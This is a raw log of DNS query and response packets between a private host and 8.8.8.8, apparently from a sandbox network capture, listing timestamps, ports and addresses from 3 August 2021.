Aug 3, 2021 19:01:54.722306013 CEST	56130	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:54.762475014 CEST	53	56130	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:56.924621105 CEST	56338	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:56.959481955 CEST	53	56338	8.8.8.8	192.168.2.3
Aug 3, 2021 19:01:59.130711079 CEST	59420	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:01:59.165488958 CEST	53	59420	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:01.320058107 CEST	58784	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:01.352756977 CEST	53	58784	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:03.553585052 CEST	63978	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:03.588093042 CEST	53	63978	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:07.920561075 CEST	62938	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:07.945453882 CEST	53	62938	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:10.120966911 CEST	55708	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:10.148989916 CEST	53	55708	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:12.344211102 CEST	56803	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:12.380321980 CEST	53	56803	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:13.952964067 CEST	57145	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:14.006561041 CEST	53	57145	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:14.686839104 CEST	55359	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:14.720417976 CEST	53	55359	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:14.762020111 CEST	58306	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:14.794553041 CEST	53	58306	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:15.820312023 CEST	64124	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:15.853841066 CEST	53	64124	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:16.505778074 CEST	49361	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:16.530379057 CEST	53	49361	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:16.953767061 CEST	63150	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:16.986277103 CEST	53	63150	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:17.063890934 CEST	53279	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:17.122783899 CEST	53	53279	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:17.593175888 CEST	56881	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:17.625838995 CEST	53	56881	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:18.356370926 CEST	53642	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:18.391232014 CEST	53	53642	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:19.030920029 CEST	55667	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:19.066551924 CEST	53	55667	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:19.211441040 CEST	54833	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:19.246603966 CEST	53	54833	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:19.856076956 CEST	62476	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:19.889893055 CEST	53	62476	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:20.262491941 CEST	49705	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:20.295572042 CEST	53	49705	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:21.429611921 CEST	61477	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:21.462229967 CEST	53	61477	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:23.626596928 CEST	61633	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:23.651187897 CEST	53	61633	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:25.812108994 CEST	55949	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:25.846793890 CEST	53	55949	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:28.016876936 CEST	57601	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:28.050857067 CEST	53	57601	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:30.218873978 CEST	49342	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:30.252289057 CEST	53	49342	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:32.420996904 CEST	56253	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:32.456573009 CEST	53	56253	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:34.679191113 CEST	49667	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:34.704158068 CEST	53	49667	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:36.880808115 CEST	55439	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:36.915652990 CEST	53	55439	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:39.080692053 CEST	57069	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:39.113240957 CEST	53	57069	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:41.443295956 CEST	57659	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:41.475824118 CEST	53	57659	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:43.643707991 CEST	54717	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:43.676137924 CEST	53	54717	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:45.850692987 CEST	63975	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:45.884254932 CEST	53	63975	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:48.038158894 CEST	56639	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:48.070511103 CEST	53	56639	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:50.265275955 CEST	51856	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:50.297590971 CEST	53	51856	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:52.473217964 CEST	56546	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:52.508933067 CEST	53	56546	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:54.709424973 CEST	62152	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:54.752672911 CEST	53	62152	8.8.8.8	192.168.2.3
Aug 3, 2021 19:02:57.038458109 CEST	53470	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:02:57.072422028 CEST	53	53470	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:00.213896036 CEST	56446	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:00.250510931 CEST	53	56446	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:02.430080891 CEST	59631	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:02.455005884 CEST	53	59631	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:04.613842010 CEST	55515	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:04.646204948 CEST	53	55515	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:06.893040895 CEST	64547	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:06.928741932 CEST	53	64547	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:09.084055901 CEST	51759	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:09.116533041 CEST	53	51759	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:11.271615028 CEST	59207	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:11.308238029 CEST	53	59207	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:13.477817059 CEST	54269	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:13.514050961 CEST	53	54269	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:15.679207087 CEST	54856	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:15.711858988 CEST	53	54856	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:17.865520954 CEST	64140	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:17.903259039 CEST	53	64140	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:20.084985018 CEST	62271	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:20.122246981 CEST	53	62271	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:22.322797060 CEST	57404	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:22.355321884 CEST	53	57404	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:24.522763014 CEST	62997	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:24.558729887 CEST	53	62997	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:26.742661953 CEST	57712	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:26.767282009 CEST	53	57712	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:28.930773973 CEST	60065	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:28.955493927 CEST	53	60065	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:31.135622978 CEST	55068	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:31.168095112 CEST	53	55068	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:33.318119049 CEST	64700	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:33.353689909 CEST	53	64700	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:35.511454105 CEST	61998	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:35.545561075 CEST	53	61998	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:37.775151014 CEST	53724	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:37.810373068 CEST	53	53724	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:39.970947981 CEST	52328	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:40.006287098 CEST	53	52328	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:42.164659977 CEST	58051	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:42.196994066 CEST	53	58051	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:44.354120970 CEST	64130	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:44.389393091 CEST	53	64130	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:46.570506096 CEST	50491	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:46.604208946 CEST	53	50491	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:48.773654938 CEST	53004	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:48.798176050 CEST	53	53004	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:50.951783895 CEST	52529	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:50.985971928 CEST	53	52529	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:53.197990894 CEST	53656	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:53.231578112 CEST	53	53656	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:55.415544033 CEST	62724	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:55.451174021 CEST	53	62724	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:57.632731915 CEST	56059	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:57.659317017 CEST	53	56059	8.8.8.8	192.168.2.3
Aug 3, 2021 19:03:59.824805975 CEST	63060	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:03:59.858313084 CEST	53	63060	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:02.424027920 CEST	51498	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:02.451447010 CEST	53	51498	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:05.025619984 CEST	59943	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:05.058403969 CEST	53	59943	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:07.243323088 CEST	50118	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:07.278501987 CEST	53	50118	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:09.483490944 CEST	58357	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:09.519002914 CEST	53	58357	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:11.765233040 CEST	55804	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:11.806792974 CEST	53	55804	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:14.084388971 CEST	58079	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:14.118324041 CEST	53	58079	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:16.275333881 CEST	52080	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:16.308108091 CEST	53	52080	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:16.873356104 CEST	55238	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:16.920137882 CEST	53	55238	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:17.141740084 CEST	49289	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:17.169322014 CEST	53	49289	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:17.514652967 CEST	61034	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:17.563154936 CEST	53	61034	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:18.478743076 CEST	51964	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:18.513947010 CEST	53	51964	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:20.698674917 CEST	58241	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:20.731728077 CEST	53	58241	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:22.901813030 CEST	59571	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:22.938019991 CEST	53	59571	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:24.441721916 CEST	51708	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:24.489818096 CEST	53	51708	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:25.226316929 CEST	60709	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:25.258712053 CEST	53	60709	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:27.418201923 CEST	63643	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:27.443067074 CEST	53	63643	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:29.198559046 CEST	62823	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:29.233833075 CEST	53	62823	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:29.557809114 CEST	63750	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:29.601564884 CEST	53	63750	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:29.614897013 CEST	61959	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:29.647238970 CEST	53	61959	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:31.996125937 CEST	63554	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:32.033607960 CEST	53	63554	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:34.188719988 CEST	57723	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:34.233795881 CEST	53	57723	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:36.419224977 CEST	58663	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:36.463515043 CEST	53	58663	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:38.651132107 CEST	50980	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:38.686813116 CEST	53	50980	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:40.952564955 CEST	50067	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:40.992608070 CEST	53	50067	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:43.204242945 CEST	52992	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:43.237854958 CEST	53	52992	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:45.405143023 CEST	55129	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:45.437777042 CEST	53	55129	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:47.623676062 CEST	60959	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:47.660789967 CEST	53	60959	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:49.844846964 CEST	58319	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:49.880382061 CEST	53	58319	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:52.075742960 CEST	64785	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:52.111000061 CEST	53	64785	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:54.286129951 CEST	50208	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:54.321608067 CEST	53	50208	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:56.573766947 CEST	62477	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:56.613110065 CEST	53	62477	8.8.8.8	192.168.2.3
Aug 3, 2021 19:04:58.795171022 CEST	54467	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:04:58.823889971 CEST	53	54467	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:01.028712034 CEST	60548	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:01.053582907 CEST	53	60548	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:03.249236107 CEST	59623	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:03.279337883 CEST	53	59623	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:05.473995924 CEST	51689	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:05.506740093 CEST	53	51689	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:07.687529087 CEST	64806	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:07.727588892 CEST	53	64806	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:10.196857929 CEST	49686	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:10.224415064 CEST	53	49686	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:12.714188099 CEST	56195	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:12.749973059 CEST	53	56195	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:14.921039104 CEST	62241	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:14.958893061 CEST	53	62241	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:17.109873056 CEST	50543	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:17.145004988 CEST	53	50543	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:19.332648039 CEST	56445	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:19.365232944 CEST	53	56445	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:21.520255089 CEST	56709	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:21.552804947 CEST	53	56709	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:23.720985889 CEST	51248	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:23.757006884 CEST	53	51248	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:25.923397064 CEST	49679	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:25.959387064 CEST	53	49679	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:28.157883883 CEST	50263	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:28.191822052 CEST	53	50263	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:30.346065044 CEST	49215	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:30.381278038 CEST	53	49215	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:32.537942886 CEST	64372	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:32.573491096 CEST	53	64372	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:34.719111919 CEST	50016	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:34.744133949 CEST	53	50016	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:36.924958944 CEST	61325	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:36.961061954 CEST	53	61325	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:39.130440950 CEST	49160	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:39.165993929 CEST	53	49160	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:41.315402031 CEST	51265	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:41.342091084 CEST	53	51265	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:43.540107012 CEST	52006	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:43.572525024 CEST	53	52006	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:45.754501104 CEST	58697	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:45.787534952 CEST	53	58697	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:47.940515041 CEST	51530	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:47.976157904 CEST	53	51530	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:50.126950026 CEST	50989	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:50.160826921 CEST	53	50989	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:52.331804991 CEST	53323	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:52.357184887 CEST	53	53323	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:54.534140110 CEST	59034	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:54.568398952 CEST	53	59034	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:56.720890045 CEST	53106	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:56.756485939 CEST	53	53106	8.8.8.8	192.168.2.3
Aug 3, 2021 19:05:58.957617998 CEST	62132	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:05:58.990415096 CEST	53	62132	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:01.144287109 CEST	54489	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:01.181267023 CEST	53	54489	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:03.333826065 CEST	64390	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:03.364897013 CEST	53	64390	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:05.550487041 CEST	58369	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:05.585144997 CEST	53	58369	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:07.741825104 CEST	64203	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:07.775700092 CEST	53	64203	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:09.941957951 CEST	49232	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:09.969455957 CEST	53	49232	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:12.149107933 CEST	52558	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:12.181878090 CEST	53	52558	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:15.198581934 CEST	53555	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:15.233902931 CEST	53	53555	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:17.397550106 CEST	50083	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:17.436507940 CEST	53	50083	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:19.587477922 CEST	49804	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:19.619803905 CEST	53	49804	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:21.772907972 CEST	62963	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:21.808489084 CEST	53	62963	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:23.959944010 CEST	63695	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:23.992546082 CEST	53	63695	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:26.166287899 CEST	64296	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:26.202452898 CEST	53	64296	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:28.366338015 CEST	60844	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:28.401519060 CEST	53	60844	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:30.600789070 CEST	63917	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:30.626837969 CEST	53	63917	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:32.799395084 CEST	51851	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:32.831609011 CEST	53	51851	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:34.995313883 CEST	49898	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:35.025839090 CEST	53	49898	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:37.197623014 CEST	49632	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:37.231322050 CEST	53	49632	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:39.385412931 CEST	65361	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:39.421473026 CEST	53	65361	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:41.637833118 CEST	50206	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:41.665680885 CEST	53	50206	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:43.841898918 CEST	49613	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:43.874284983 CEST	53	49613	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:46.065788031 CEST	63032	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:46.092864037 CEST	53	63032	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:48.259576082 CEST	54898	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:48.294316053 CEST	53	54898	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:50.478462934 CEST	61710	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:50.514136076 CEST	53	61710	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:52.664053917 CEST	52073	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:52.690589905 CEST	53	52073	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:54.146475077 CEST	63949	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:54.193475962 CEST	53	63949	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:54.869762897 CEST	57561	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:54.903347015 CEST	53	57561	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:57.063138962 CEST	53205	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:57.096909046 CEST	53	53205	8.8.8.8	192.168.2.3
Aug 3, 2021 19:06:59.274760008 CEST	60579	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:06:59.308945894 CEST	53	60579	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:01.536617041 CEST	49765	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:01.572048903 CEST	53	49765	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:03.743144989 CEST	57650	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:03.779144049 CEST	53	57650	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:05.939706087 CEST	65317	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:05.974879980 CEST	53	65317	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:08.149225950 CEST	64654	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:08.178571939 CEST	53	64654	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:10.377194881 CEST	51191	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:10.413378954 CEST	53	51191	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:12.588496923 CEST	63870	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:12.616333008 CEST	53	63870	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:14.790198088 CEST	57013	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:14.823110104 CEST	53	57013	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:17.232678890 CEST	58745	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:17.267951012 CEST	53	58745	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:19.495464087 CEST	64272	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:19.534274101 CEST	53	64272	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:21.703489065 CEST	56440	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:21.735933065 CEST	53	56440	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:23.890366077 CEST	59492	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:23.916037083 CEST	53	59492	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:26.093004942 CEST	62125	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:26.126003981 CEST	53	62125	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:28.307390928 CEST	61776	53	192.168.2.3	8.8.8.8
Aug 3, 2021 19:07:28.345453024 CEST	53	61776	8.8.8.8	192.168.2.3
Aug 3, 2021 19:07:28.732209921 CEST	53928	53	192.168.2.3	8.8.8.8
